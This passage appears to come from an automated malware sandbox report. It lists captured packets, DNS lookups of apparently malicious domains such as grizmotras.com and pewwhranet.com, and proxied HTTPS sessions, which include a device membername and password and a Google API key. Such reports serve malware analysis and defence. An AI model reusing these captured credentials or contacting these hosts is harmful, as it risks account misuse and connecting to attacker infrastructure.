                                                                                                Apr 26, 2024 23:24:24.399895906 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.399936914 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.400130033 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.403505087 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.403522015 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.662771940 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.662858009 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.663444042 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.663453102 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:24.665005922 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:24.665011883 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.604988098 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.605051041 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605070114 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.605119944 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605127096 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.605202913 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605356932 CEST49841443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.605374098 CEST44349841104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.674494982 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.674525976 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.674593925 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.674839973 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.674845934 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.934026957 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.934087992 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.934567928 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.934582949 CEST44349842104.21.59.82192.168.2.5
                                                                                                Apr 26, 2024 23:24:28.946510077 CEST49842443192.168.2.5104.21.59.82
                                                                                                Apr 26, 2024 23:24:28.946516991 CEST44349842104.21.59.82192.168.2.5

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Apr 26, 2024 23:15:12.924079895 CEST53583131.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:15:12.925244093 CEST53516401.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.163482904 CEST6474053192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:15:13.163855076 CEST6536553192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:15:13.289181948 CEST53647401.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:15:13.289210081 CEST53653651.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:15:14.068660975 CEST53641801.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:15:35.691371918 CEST53590811.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:15:56.046691895 CEST53628421.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:16:12.644725084 CEST53594711.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:16:19.078530073 CEST53546281.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:16:41.490566015 CEST53635271.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:16:51.253603935 CEST5914153192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:16:51.391927958 CEST53591411.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:17:21.917176962 CEST138138192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:21.917176962 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:22.660262108 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:23.420367956 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:23.700438976 CEST5933553192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:17:23.866564035 CEST53593351.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:17:25.201649904 CEST138138192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:25.201704979 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:25.955128908 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:26.717233896 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:28.467492104 CEST138138192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:28.467492104 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:29.232861042 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:29.982892036 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:31.767129898 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:32.515130997 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:33.279762030 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:34.364751101 CEST138138192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:34.364752054 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:35.123522043 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:35.889166117 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:37.639450073 CEST138138192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:37.639731884 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:38.404782057 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:39.170402050 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:40.936094046 CEST138138192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:40.936167002 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:41.703149080 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:42.453197956 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:44.203150034 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:44.967317104 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:17:45.717324972 CEST137137192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:18:07.531179905 CEST6425653192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:18:07.726401091 CEST53642561.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:18:54.847595930 CEST138138192.168.2.5192.168.2.255
                                                                                                Apr 26, 2024 23:19:49.452280045 CEST6200453192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:19:49.614212036 CEST53620041.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:20:07.799391985 CEST5290653192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:20:07.965384960 CEST53529061.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:21:31.405543089 CEST5331553192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:21:31.539031982 CEST53533151.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:23:13.335530996 CEST4934953192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:23:13.531917095 CEST53493491.1.1.1192.168.2.5
                                                                                                Apr 26, 2024 23:23:24.682872057 CEST6061353192.168.2.51.1.1.1
                                                                                                Apr 26, 2024 23:23:24.809706926 CEST53606131.1.1.1192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Apr 26, 2024 23:15:13.163482904 CEST192.168.2.51.1.1.10x972Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:15:13.163855076 CEST192.168.2.51.1.1.10x59daStandard query (0)www.google.com65IN (0x0001)false
                                                                                                Apr 26, 2024 23:16:51.253603935 CEST192.168.2.51.1.1.10xbcc1Standard query (0)jarinamaers.shopA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:17:23.700438976 CEST192.168.2.51.1.1.10x5bf6Standard query (0)grizmotras.comA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:18:07.531179905 CEST192.168.2.51.1.1.10x613cStandard query (0)grizmotras.comA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:19:49.452280045 CEST192.168.2.51.1.1.10xfd43Standard query (0)grizmotras.comA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:20:07.799391985 CEST192.168.2.51.1.1.10x4581Standard query (0)pewwhranet.comA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:21:31.405543089 CEST192.168.2.51.1.1.10x4a72Standard query (0)pewwhranet.comA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:23:13.335530996 CEST192.168.2.51.1.1.10xf059Standard query (0)pewwhranet.comA (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:23:24.682872057 CEST192.168.2.51.1.1.10xbbb3Standard query (0)grizmotras.comA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Apr 26, 2024 23:15:13.289181948 CEST1.1.1.1192.168.2.50x972No error (0)www.google.com142.250.217.228A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:15:13.289210081 CEST1.1.1.1192.168.2.50x59daNo error (0)www.google.com65IN (0x0001)false
                                                                                                Apr 26, 2024 23:16:51.391927958 CEST1.1.1.1192.168.2.50xbcc1No error (0)jarinamaers.shop104.21.46.75A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:16:51.391927958 CEST1.1.1.1192.168.2.50xbcc1No error (0)jarinamaers.shop172.67.136.103A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:17:23.866564035 CEST1.1.1.1192.168.2.50x5bf6No error (0)grizmotras.com172.67.219.28A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:17:23.866564035 CEST1.1.1.1192.168.2.50x5bf6No error (0)grizmotras.com104.21.59.82A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:18:07.726401091 CEST1.1.1.1192.168.2.50x613cNo error (0)grizmotras.com104.21.59.82A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:18:07.726401091 CEST1.1.1.1192.168.2.50x613cNo error (0)grizmotras.com172.67.219.28A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:19:49.614212036 CEST1.1.1.1192.168.2.50xfd43No error (0)grizmotras.com172.67.219.28A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:19:49.614212036 CEST1.1.1.1192.168.2.50xfd43No error (0)grizmotras.com104.21.59.82A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:20:07.965384960 CEST1.1.1.1192.168.2.50x4581No error (0)pewwhranet.com104.21.84.207A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:20:07.965384960 CEST1.1.1.1192.168.2.50x4581No error (0)pewwhranet.com172.67.197.34A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:21:31.539031982 CEST1.1.1.1192.168.2.50x4a72No error (0)pewwhranet.com172.67.197.34A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:21:31.539031982 CEST1.1.1.1192.168.2.50x4a72No error (0)pewwhranet.com104.21.84.207A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:23:13.531917095 CEST1.1.1.1192.168.2.50xf059No error (0)pewwhranet.com104.21.84.207A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:23:13.531917095 CEST1.1.1.1192.168.2.50xf059No error (0)pewwhranet.com172.67.197.34A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:23:24.809706926 CEST1.1.1.1192.168.2.50xbbb3No error (0)grizmotras.com104.21.59.82A (IP address)IN (0x0001)false
                                                                                                Apr 26, 2024 23:23:24.809706926 CEST1.1.1.1192.168.2.50xbbb3No error (0)grizmotras.com172.67.219.28A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • login.live.com
                                                                                                • www.google.com
                                                                                                • fs.microsoft.com
                                                                                                • slscr.update.microsoft.com
                                                                                                • https:
                                                                                                  • www.bing.com
                                                                                                • jarinamaers.shop
                                                                                                • grizmotras.com
                                                                                                • self.events.data.microsoft.com
                                                                                                • pewwhranet.com

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.54970440.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:11 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:11 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:11 UTC568INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:11 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: da6a79d2-0743-44a6-a39c-bfa5b5e8c7b4
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002FAB1 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:11 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1276
                                                                                                2024-04-26 21:15:11 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.54970840.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:12 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 7642
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:12 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 74 63 71 6f 6e 7a 64 65 6d 66 74 6f 71 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 63 62 41 55 38 4f 35 5a 63 58 71 2c 3b 49 31 66 49 37 4c 70 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d
                                                                                                Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02vtcqonzdemftoq</Membername><Password>cbAU8O5ZcXq,;I1fI7Lp</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
                                                                                                2024-04-26 21:15:14 UTC542INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/xml
                                                                                                Expires: Fri, 26 Apr 2024 21:14:13 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C542_SN1
                                                                                                x-ms-request-id: d8a8e60f-0be4-40bf-aaaf-9dc0d66c6c55
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F0A1 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:13 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 17166
                                                                                                2024-04-26 21:15:14 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 30 30 30 46 30 34 31 42 45 30 37 45 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 64 61 63 34 39 39 39 38 2d 35 65 33 32 2d 34 66 38 63 2d 62 34 37 39 2d 38 31 32 33 66 35 30 37 66 34 35 34 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018000F041BE07E</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="dac49998-5e32-4f8c-b479-8123f507f454" LicenseID="3252b20c-d425-4711
                                                                                                2024-04-26 21:15:14 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.54970740.126.28.23443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:12 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:12 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:13 UTC568INHTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:13 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: a3fdef74-b352-44b2-8c29-03b033f73098
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F939 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:12 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1276
                                                                                                2024-04-26 21:15:13 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549715142.250.217.2284437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:15:13 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
